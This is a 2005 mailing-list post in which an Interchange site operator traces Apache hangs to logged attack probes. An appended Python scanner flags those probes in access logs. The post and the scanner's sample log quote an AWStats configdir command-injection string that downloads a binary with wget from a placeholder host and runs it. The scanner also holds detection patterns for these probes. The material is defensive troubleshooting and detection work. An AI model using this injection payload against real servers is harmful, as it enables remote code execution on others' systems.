
RE: [ic] mod_interchange and Apache MaxClients


########### snippet from previous post:
The Apache access log shows just 3 entries before the site went down, all
from hackers_IP.  For interest, these were along the lines of:

/cgi-bin/awstats/awstats.pl/?configdir=|echo;echo YYY;cd /tmp;wget x.x.x.x/flisten;chmod +x listen;./listen y.y.y.y;echo YYY;echo|
##########

OK, it's conclusive, the above "hacker" script is definitely the cause of our site stopping responding at the moment (and I suspect Ron's and Jeff's also - can you confirm this?). Our site stopped responding again tonight and was restarted by Ron's script again. This time the site went down when there were many connections, but one IP address stood out as having 10 connections to Apache. Sure enough, when I searched our Apache access log for access from this suspicious IP address I saw the same 3 entries as the last time the site stopped responding:

1) /awstats/awstats.pl/?configdir=|echo;echo YYY;cd /tmp;wget x.x.x.x/flisten;chmod +x listen;./listen y.y.y.y;echo YYY;echo|

2) /cgi-bin/awstats.pl/?configdir=|echo;echo YYY;cd /tmp;wget x.x.x.x/flisten;chmod +x listen;./listen y.y.y.y;echo YYY;echo|

3) /cgi-bin/awstats/awstats.pl/?configdir=|echo;echo YYY;cd /tmp;wget x.x.x.x/flisten;chmod +x listen;./listen y.y.y.y;echo YYY;echo|

Now these were the only 3 entries, but searching around on the web I have found that this script goes on to try to exploit the XML-RPC vulnerability by sending a variety of POST requests to xmlrpc.php (which it tries to find in a variety of locations),

e.g. POST /drupal/xmlrpc.php with XML in the body of the POST request.

Here is an analysis of the packets sent (not particularly readable, but all the information is there):
http://www.philippinehoneynet.org/charts_2005-11-11/awstats.html

There are many references to this hacking script on the web - most dated Nov 2005, so it appears to be a very new script. Here are a couple of links to overviews:
http://www.philippinehoneynet.org/dataarchive.php?date=2005-11-11
http://isc.sans.org/diary.php?storyid=823

We did have several sites running on the same Apache webserver, but they were all development sites, so once Apache started hanging I decided to remove all the other sites so that Apache was only hosting our main Interchange website. Interestingly, prior to removing these other websites I was seeing these POST requests to xmlrpc.php in the Apache error log (but in relation to our *non-interchange* websites). Since removing these websites, I am not seeing any of these xmlrpc.php POST attempts in the Apache error log.

As mentioned, the *only* 3 requests from the hacker's IP address before the site stops responding are the 3 awstats.pl GET requests. I believe the 4th request (which we don't see in the log) is a POST request to xmlrpc.php.

From this, I conclude that this same script when used against our other websites was not causing Apache to fall over. But, when used against our Interchange site the webserver does stop responding. So, it looks like it is these POST attempts to non-existent pages on our Interchange site that are causing Apache to hang, so I presume it is mod_interchange that is being tripped up by these POST requests.

I know that the Interchange missing.html page is served up if a GET request is made for a non-existent page, but what happens if a POST request is made for a non-existent page? As mentioned, the POST request tries to send some XML in the body of its request (the above 2 links provide more detail).

Kevin, I am rather hoping that you may be able to spot a reason why mod_interchange may not be coping well with these POST requests to the non-existent xmlrpc.php page? Thank you everyone for your continued help on trying to solve this one - hopefully we are getting closer...

_______________________________________________
interchange-users mailing list
suppressed
http://www.icdevgroup.org/mailman/listinfo/interchange-users
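The two probe patterns described in the post above (awstats.pl GETs carrying shell commands in `configdir=`, followed by POSTs to xmlrpc.php in guessed locations), turned into a small access-log scanner. This is an added example, not code from the list post, from Interchange or from Apache. It assumes Apache's combined log format; the log lines are constructed for the example, using documentation IP ranges for the clients, and the injection payload is the one quoted in the thread with the poster's x.x.x.x / y.y.y.y placeholders left as they are. The encoded variant is included because scanners often URL-encode the pipe and semicolons, so a match on the raw line alone would miss it.

```python
"""Scan Apache combined-format access logs for the awstats configdir
command-injection probe and xmlrpc.php POST probes, grouped by client IP.
Added example; not code from the mailing-list post or from Interchange."""
import re
from collections import defaultdict
from urllib.parse import unquote

# Combined log format: host ident user [time] "request" status bytes "referer" "ua"
# The request is captured whole because an unencoded injection string
# contains spaces, so a \S+ path pattern would not match it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)'
)

# Shell metacharacters that have no business in a configdir value.
SHELL_META_RE = re.compile(r"[|;`]|\$\(")


def split_request(request):
    """Split 'GET /path?x=a b HTTP/1.0' into ('GET', '/path?x=a b')."""
    method, _, rest = request.partition(" ")
    proto_idx = rest.rfind(" HTTP/")
    path = rest[:proto_idx] if proto_idx != -1 else rest
    return method, path


def classify(method, path):
    """Return a tag for a known probe, or None for ordinary traffic."""
    decoded = unquote(path)          # fold %7C etc. back to the raw characters
    lower = decoded.lower()
    if "awstats.pl" in lower and "configdir=" in lower:
        # Vulnerable AWStats versions pass configdir into a shell command;
        # a pipe or separator right after '=' is the injection tell.
        value = lower.split("configdir=", 1)[1]
        if SHELL_META_RE.search(value):
            return "awstats_configdir_injection"
    if method == "POST" and lower.split("?", 1)[0].rstrip("/").endswith("xmlrpc.php"):
        return "xmlrpc_post_probe"
    return None


def scan(lines):
    """Map client IP -> {probe tag -> count} over the given log lines."""
    hits = defaultdict(lambda: defaultdict(int))
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        method, path = split_request(m.group("request"))
        tag = classify(method, path)
        if tag:
            hits[m.group("ip")][tag] += 1
    return {ip: dict(tags) for ip, tags in hits.items()}


# Constructed sample log (not real traffic). 203.0.113.7 replays the probe
# sequence from the thread; 198.51.100.9 is a legitimate AWStats user.
SAMPLE_LOG = [
    '203.0.113.7 - - [11/Nov/2005:22:14:01 +0000] "GET /cgi-bin/awstats/awstats.pl/'
    '?configdir=|echo;echo YYY;cd /tmp;wget x.x.x.x/flisten;chmod +x listen;'
    './listen y.y.y.y;echo YYY;echo| HTTP/1.0" 404 291 "-" "-"',
    '203.0.113.7 - - [11/Nov/2005:22:14:02 +0000] "GET /cgi-bin/awstats.pl/'
    '?configdir=%7Cecho%3Becho%20YYY%3Bcd%20/tmp%3Bwget%20x.x.x.x/flisten%3B'
    'chmod%20%2Bx%20listen%3B./listen%20y.y.y.y%3Becho%20YYY%3Becho%7C HTTP/1.0" 404 291 "-" "-"',
    '203.0.113.7 - - [11/Nov/2005:22:14:03 +0000] "POST /drupal/xmlrpc.php HTTP/1.0" 404 291 "-" "-"',
    '198.51.100.9 - - [11/Nov/2005:22:15:10 +0000] "GET /awstats/awstats.pl?config=example.com HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [11/Nov/2005:22:15:11 +0000] "GET /index.html HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for ip, tags in scan(SAMPLE_LOG).items():
        print(ip, tags)
```

Pipe a real log through `scan()` (e.g. `scan(open("access_log"))`) to get the per-IP breakdown; an IP that shows both tags within a few seconds is the sequence the post describes. Note that the awstats entries return 404 here because the script probes paths that do not exist on this host, which is exactly the situation in the thread: the request is harmless to the server unless AWStats is actually installed at one of the guessed locations.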